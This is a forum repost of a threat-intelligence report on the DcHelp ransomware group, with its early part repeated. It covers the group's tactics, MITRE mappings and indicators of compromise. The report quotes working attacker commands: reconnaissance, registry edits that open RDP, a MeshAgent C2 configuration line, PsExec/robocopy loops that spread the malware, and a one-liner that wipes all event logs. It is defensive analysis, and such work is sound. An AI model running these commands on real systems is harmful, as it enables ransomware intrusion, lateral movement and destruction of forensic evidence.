Man
Professional
- Messages
- 3,014
- Reaction score
- 539
- Points
- 113
While investigating another incident related to a ransomware attack, and hearing once again the question “how can this be, we have an antivirus!?”, we decided to share with the community information about the renewed activity of the DсHelp group.
In this article, we will talk about the increasing frequency of DсHelp attacks, consider the tactics and techniques of this group, and also note why antivirus is not a panacea and how legitimate software can be used against you.
Attackers have increasingly begun to use completely legitimate tools in their attacks, including data encryption tools that do not arouse suspicion in antivirus software. Let's look at one such group, whose activity increased in late 2024.
If the attack on the infrastructure is successful, the attackers contact the victims via e-mail, Telegram or other means and demand to purchase a password to regain access to the data. The ransom amount varies from $1,000 to $100,000. Payment is taken in Bitcoin, but it is possible to use other cryptocurrency.
At the time of publication, the website https://dchelp.org/ is active, where you can read the FAQ and even leave feedback.
The DcHelp group has been active since at least late 2022, with recent incidents involving it recorded and investigated by the Jet CSIRT team in the second half of 2024.
To gain initial access to its victims' infrastructure, DcHelp primarily targets "low-hanging fruit" and exploits vulnerabilities in publicly accessible services, conducts password guessing attacks, and uses legitimate credentials purchased from initial access brokers or found in leaks.
Having gained access to a node, the first thing attackers do is conduct reconnaissance and study the environment - for example, information about
If the system was accessed with an unprivileged account, the attackers escalate privileges and search for credentials in the system. To do this, they use the following tools:
Attackers also search for password information in readable files and directories using search mechanisms built into operating systems, and they also search for saved passwords in browsers and email.
To collect additional information about the infrastructure, attackers use:
Example PowerShell command:
The collected information is often saved directly on compromised systems in the temporary directory C:\tmp\:
Fixation, distribution
After receiving information about the infrastructure, attackers actively use batch files to distribute and launch malware in their attacks. For example, one of the scripts changes the Windows registry settings, allowing remote connections via RDP:
To gain a foothold in the infrastructure, attackers use MeshAgent, which is compiled with the indication of its own C2 server:
MeshAgent receives connection instructions from a .msh file, in the format "key=value". This file is not always found on compromised systems, but we can extract the lines of interest from the MeshAgent executable:
This C2 server remained unchanged through multiple attacks.
Distribution of malware in the infrastructure is carried out using the robocopy utility:
Installation and launch of malware is performed using PsExec:
The encryption tool used is open source software DiskCryptor, and the hash of the executable file may differ from incident to incident, since a specific instance may have been compiled immediately before the attack. The attackers disguise this software as other legitimate programs, such as Notepad.exe.
It is interesting that if the infrastructure contains (and can be compromised) a Kaspersky Security Center server, attackers prefer to use its functionality to launch tasks for distributing and installing malware on endpoints:
MeshAgent distribution via compromised KSC:
Impact
After all the preparatory actions, the attackers encrypt the infrastructure by executing similar batch files that launch encryption on each node from the list in the host.txt file.
The encryption password is created by the algorithm described in the batch file, using the random number generation function, and the password length is 13 characters (Latin letters and numbers). Encryption is performed by cryptographically strong algorithms (AES-256, Twofish, Serpent). The generated encryption passwords are copied by intruders and deleted after the encryption process is complete.
Next, traces of presence on the node can be erased by clearing the OS logs:
Is recovery possible?
During the investigation of incidents among the deleted files, we were able to recover several passwords, which allowed us to decrypt some of the servers.
If the system has not been rebooted since the incident, there is a chance to extract passwords from RAM. However, we do not recommend relying on luck, but using best practices for creating backups. The "3-2-1" principle has not been canceled, but in the context of investigations we rarely see exemplary compliance with this principle. And, of course, you should not store backups in a single copy on the same device or in the same network segment.
Thus, the used combination of DiskCryptor, MeshAgent, PsExec will not arouse suspicions in the installed antivirus, except that a detection with a formulation like *not-a-virus* is possible. In addition, such an attack can be implemented using other legitimate tools: for example, the ShrinkLocker encryptor uses the Bitlocker built into Windows.
An incident investigation should end with a “lessons learned” stage, during which the factors that led to the incident are noted and measures are developed to prevent similar incidents in the future. Of course, the recommendations will vary greatly depending on the specific organization and the incident that occurred, the technologies and capabilities used.
As general recommendations, we highlight the following:
IoCs, network indicators of compromise:
IoCs, file indicators of compromise:
Source
In this article, we will talk about the increasing frequency of DсHelp attacks, consider the tactics and techniques of this group, and also note why antivirus is not a panacea and how legitimate software can be used against you.
Attackers have increasingly begun to use completely legitimate tools in their attacks, including data encryption tools that do not arouse suspicion in antivirus software. Let's look at one such group, whose activity increased in late 2024.
Profile DcHelp
DсHelp (Enigma Wolf) is a group of hackers that attacks organizations in various industries and uses open source software DiskCryptor to encrypt data from computers and servers.If the attack on the infrastructure is successful, the attackers contact the victims via e-mail, Telegram or other means and demand to purchase a password to regain access to the data. The ransom amount varies from $1,000 to $100,000. Payment is taken in Bitcoin, but it is possible to use other cryptocurrency.
At the time of publication, the website https://dchelp.org/ is active, where you can read the FAQ and even leave feedback.
The DcHelp group has been active since at least late 2022, with recent incidents involving it recorded and investigated by the Jet CSIRT team in the second half of 2024.
How DcHelp attacks
Start attacksTo gain initial access to its victims' infrastructure, DcHelp primarily targets "low-hanging fruit" and exploits vulnerabilities in publicly accessible services, conducts password guessing attacks, and uses legitimate credentials purchased from initial access brokers or found in leaks.
Having gained access to a node, the first thing attackers do is conduct reconnaissance and study the environment - for example, information about
Code:
the user, groups, domain controllers:
whoami
net user <redacted> /domain
net localgroup /domain
netdom query dc
net group "Domain Admins" /domainIf the system was accessed with an unprivileged account, the attackers escalate privileges and search for credentials in the system. To do this, they use the following tools:
- Mimikatz;
- PWVIEWER (Password Viewer);
- PWDCRACKU (Password Cracker);
- ARestore (Account Restore).
Attackers also search for password information in readable files and directories using search mechanisms built into operating systems, and they also search for saved passwords in browsers and email.
To collect additional information about the infrastructure, attackers use:
- Advanced IP Scanner;
- Advanced Port Scanner;
- PowerShell commands.
Example PowerShell command:
Code:
Get-ADComputer -Filter * -Properties * | Sort ipv4* | FT Name, ipv4, oper, LastLogonDate -AutosizeThe collected information is often saved directly on compromised systems in the temporary directory C:\tmp\:
- host.txt\hosts.txt
- computers.txt\AdComputers.txt
Fixation, distribution
After receiving information about the infrastructure, attackers actively use batch files to distribute and launch malware in their attacks. For example, one of the scripts changes the Windows registry settings, allowing remote connections via RDP:
Code:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /fTo gain a foothold in the infrastructure, attackers use MeshAgent, which is compiled with the indication of its own C2 server:
- C:\tmp\mesh.exe (also possible names are meshagent32.exe, meshagent-[domain].exe, etc.)
MeshAgent receives connection instructions from a .msh file, in the format "key=value". This file is not always found on compromised systems, but we can extract the lines of interest from the MeshAgent executable:
Code:
MeshServer=wss://techsupport.myftp.org:443/agent.ashxThis C2 server remained unchanged through multiple attacks.
Distribution of malware in the infrastructure is carried out using the robocopy utility:
Code:
for /f "delims=" %%i in (host.txt) do (
start robocopy %systemdrive%\tmp\tmp \\%%i\C$\tmp /R:0
ping 127.0.0.1 -n 1
)Installation and launch of malware is performed using PsExec:
Code:
for /f "delims=" %%i in (host.txt) do (
start psexec.exe -accepteula \\%%i -s C:\tmp\mesh.exe -fullinstall
ping 127.0.0.1 -n 1
)
for /f "delims=" %%i in (host.txt) do (
start psexec.exe -accepteula \\%%i -s sc start "mesh agent"
ping 127.0.0.1 -n 1
)
for /f "delims=" %%i in (host.txt) do (
start psexec.exe -accepteula \\%%i -s C:\tmp\Notepad.bat
start psexec.exe -accepteula \\%%i -s C:\tmp\notepad.exe /SP- /TASKS="" /NOICONS /VERYSILENT /RESTART /SUPPRESSMSGBOXES /NOCANCEL
ping 127.0.0.1 -n 1
)The encryption tool used is open source software DiskCryptor, and the hash of the executable file may differ from incident to incident, since a specific instance may have been compiled immediately before the attack. The attackers disguise this software as other legitimate programs, such as Notepad.exe.
It is interesting that if the infrastructure contains (and can be compromised) a Kaspersky Security Center server, attackers prefer to use its functionality to launch tasks for distributing and installing malware on endpoints:
MeshAgent distribution via compromised KSC:
Code:
Event 7045, A service was installed in the system.
Service: KL Deployment Wrapper
User: \System
Path: C:\Windows\TEMP\KAVREM~1\C19BB5~4\setup.exe /s /z/p\"TASK_ID=c12xx345-f67x-8910-11x1-21xbz31z4151\"
StartType: Автоматически
Cmdline: C:\Windows\Temp\KAVREM~1\C123BB4~5\exec\m.exeImpact
After all the preparatory actions, the attackers encrypt the infrastructure by executing similar batch files that launch encryption on each node from the list in the host.txt file.
The encryption password is created by the algorithm described in the batch file, using the random number generation function, and the password length is 13 characters (Latin letters and numbers). Encryption is performed by cryptographically strong algorithms (AES-256, Twofish, Serpent). The generated encryption passwords are copied by intruders and deleted after the encryption process is complete.
Next, traces of presence on the node can be erased by clearing the OS logs:
Code:
cmd - for /F tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"Is recovery possible?
During the investigation of incidents among the deleted files, we were able to recover several passwords, which allowed us to decrypt some of the servers.
If the system has not been rebooted since the incident, there is a chance to extract passwords from RAM. However, we do not recommend relying on luck, but using best practices for creating backups. The "3-2-1" principle has not been canceled, but in the context of investigations we rarely see exemplary compliance with this principle. And, of course, you should not store backups in a single copy on the same device or in the same network segment.
Lessons learned
In modern attacks, attackers often use completely legitimate tools from the point of view of information security systems to reduce the likelihood of detecting their activity.Thus, the used combination of DiskCryptor, MeshAgent, PsExec will not arouse suspicions in the installed antivirus, except that a detection with a formulation like *not-a-virus* is possible. In addition, such an attack can be implemented using other legitimate tools: for example, the ShrinkLocker encryptor uses the Bitlocker built into Windows.
An incident investigation should end with a “lessons learned” stage, during which the factors that led to the incident are noted and measures are developed to prevent similar incidents in the future. Of course, the recommendations will vary greatly depending on the specific organization and the incident that occurred, the technologies and capabilities used.
As general recommendations, we highlight the following:
- It is worth starting with Attack Surface Management and looking at your infrastructure through the eyes of attackers, and then removing all the “low-hanging fruit”: installing missing updates and removing “extra” assets from the external perimeter;
- One of the most effective measures to increase the level of security is access to the infrastructure from external networks using a VPN with two-factor authentication.
- Ensure backup of critical systems, and when implementing a backup and recovery system, adhere to the “3-2-1” rule (store at least three copies of data, two copies of which are on two different media, and the third copy is on alienable media).
Applications
MITER AT&CK:| Tactics | Technique | Description |
| Initial access | T1133 External Remote Services | Attackers use remote access services with external connection capabilities to gain initial access to the network and/or gain a foothold in it |
| Initial access | T1190 Exploit Public-Facing Application | Attackers exploit vulnerabilities in systems accessible from the Internet. For example, popular MS Exchange vulnerabilities are ProxyLogon, ProxyShell |
| Initial access | T1078 Valid Accounts | Attackers use legitimate credentials to gain initial access, gain persistence, escalate privileges, or avoid detection |
| Execution | T1059 Command and Scripting Interpreter T1059. 001 PowerShell T1059. 003 CMD | Attackers actively use command line and script interpreters to execute commands or run scripts and executable files. |
| Persistence | T1136 Create Account T1136.002 Local Accounts T1136.002 Domain Accounts | During attacks, attackers create accounts to gain a foothold in the infrastructure |
| Persistence | T1078 Valid Accounts T1078.002 Domain Accounts | Attackers use compromised UZs during attacks |
| Privilege Escalation | T1078 Valid Accounts T1078.002 Domain Accounts T1078.003 Local Accounts | Compromised legitimate domain and local accounts are used to escalate privileges |
| Defense Evasion | T1036.005 Masquerading | Attackers disguise the malware they use as other legitimate programs |
| Defense Evasion | T1562.001 Impair Defenses: Disable or Modify Tools | Attackers disable security tools and change their settings |
| Credential Access | T1003 OS Credential Dumping .001 LSASS Memory | Attackers obtain authentication data from the LSASS process memory. |
| Credential Access | T1552 Unsecured Credentials .001 Credentials In Files | Attackers search for authentication data in accessible files on compromised nodes |
| Credential Access | T1555.003 Credentials from Web Browsers | Attackers search for saved passwords in browsers |
| Credential Access | T1555.005 Password Managers | Attackers search for saved passwords in password managers |
| Discovery | T1046 Network Service Discovery | Attackers scan and search for vulnerable resources (Advanced IP Scanner, Advanced Port Scanner) |
| Discovery | T1087.001 Account Discovery: Local Account | Attackers collect information about local and domain groups using the commands whoami , net user , net group , Get-ADComputer |
| Discovery | T1087.002 Account Discovery: Domain Account | Attackers collect information about local and domain groups using the commands whoami , net user , net group , Get-ADComputer |
| Discovery | T1069.001 Permission Groups Discovery: Local Groups | Attackers collect information about local and domain groups using the commands whoami , net user , net group , Get-ADComputer |
| Discovery | T1069.001 Permission Groups Discovery: Domain Groups | Attackers collect information about local and domain groups using the commands whoami , net user , net group , Get-ADComputer |
| Discovery | T1083 File and Directory Discovery | Attackers browse files and directories on compromised systems |
| Discovery | T1217 Browser Information Discovery | Attackers look at information stored in browsers to learn more about compromised environments and to obtain authentication data. |
| Lateral Movement | T1021 Remote Services T1021.001 RDP T1021.002 SMB T1021.004 SSH | Attackers use remote access services and remote access protocols to move within the infrastructure |
| Lateral Movement | T1570 Lateral Tool Transfer | Attackers transfer tools or other files between systems on compromised systems (e.g. SMB, RDP, PsExec) |
| Command and Control | T1219 Remote Access Software | Attackers use third-party software to provide remote access and establish an interactive command and control channel on target systems. |
| Impact | T1529 System Shutdown/Reboot | Attackers can shut down/reboot systems to restrict access to these systems, reduce the chances of password recovery, and overwrite data in RAM |
| Impact | T1486 Data Encrypted for Impact | Attackers encrypt data to extort ransom |
IoCs, network indicators of compromise:
| No | IP address | Side | ASN | Additional information |
| 1. | 159.100.22.162 | OF | AS 44066 | C2 server techsupport.myftp[.]org |
IoCs, file indicators of compromise:
| No | File name | Hash | Information |
| 1. | RDPRemoteEnabler_Free.exe | MD5: f4193a842a3f9ca03f687c7515e330ac SHA-1: 229b429820f63b9aa83cb1fd9a29c5c8d0410dd2 SHA-256: 9efa419cc3bb00ebb0f101685ff86b09a78ea230415ad09e7044e90fb357d6b2 | Change Windows settings to allow RDP connections |
| 2. | advanced_port_scanner_2.5.3869.exe | MD5: 6a58b52b184715583cda792b56a0a1ed SHA-1: 3477a173e2c1005a81d042802ab0f22cc12a4d55 SHA-256: d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb | Network scanner |
| 3. | clear.bat | MD5: 9b6becd8aeb8a42e70a6200a40600100 SHA-1: 4470d0f7d52eb130816cced2638f1b3300ee70c4 SHA-256: b33fd3420bffa92cadbe90497b3036b5816f2157100bf1d9a3b6c946108148bf | Script for cleaning OS logs |
| 4. | mesh.exe | SHA1: 39F9CAA77483E26337F598E04F8C6166 | MeshAgent |
| 5. | meshagent32.exe | SHA1: b4a5f9f3af3cef951259675128cf56808832d91a | MeshAgent |
| 6. | notepad.exe | MD5: def004f1ed671f0627970ecbf241371e SHA-1: 98f4e14d9378ff50ab882ad37263465fa0cf8d31 SHA-256: 018d0b2af8479147def984a4c6a0db31703baacd87557d51271ad8c952f450b8 | DiskCryptor |
| 7. | universaltermsrvpatch-x64.exe | MD5: 0546abe6293ba40348e1734fafca47ec SHA-1: 37c0d892b38bbf9d8c6a8d35db5b32555cb758c8 SHA-256: 5161cdafd0c6d79616d775f79214b2e7e3ad13de71db63e9fa6bfc448ba4084b | Software for changing Windows settings, allowing RDP multi-sessions |
| 8. | ARestore.exe | MD5 7f86b67ac003eda9d2929c9317025013 SHA-1 343051cc1b3f33201d076478ea9badc796951423 SHA-256 fcea81909388611359bbaf41871300075e192a3246b9e1bebc5f3f0aaa2b2c9a | hacktool.bruteforce/msil |
Source
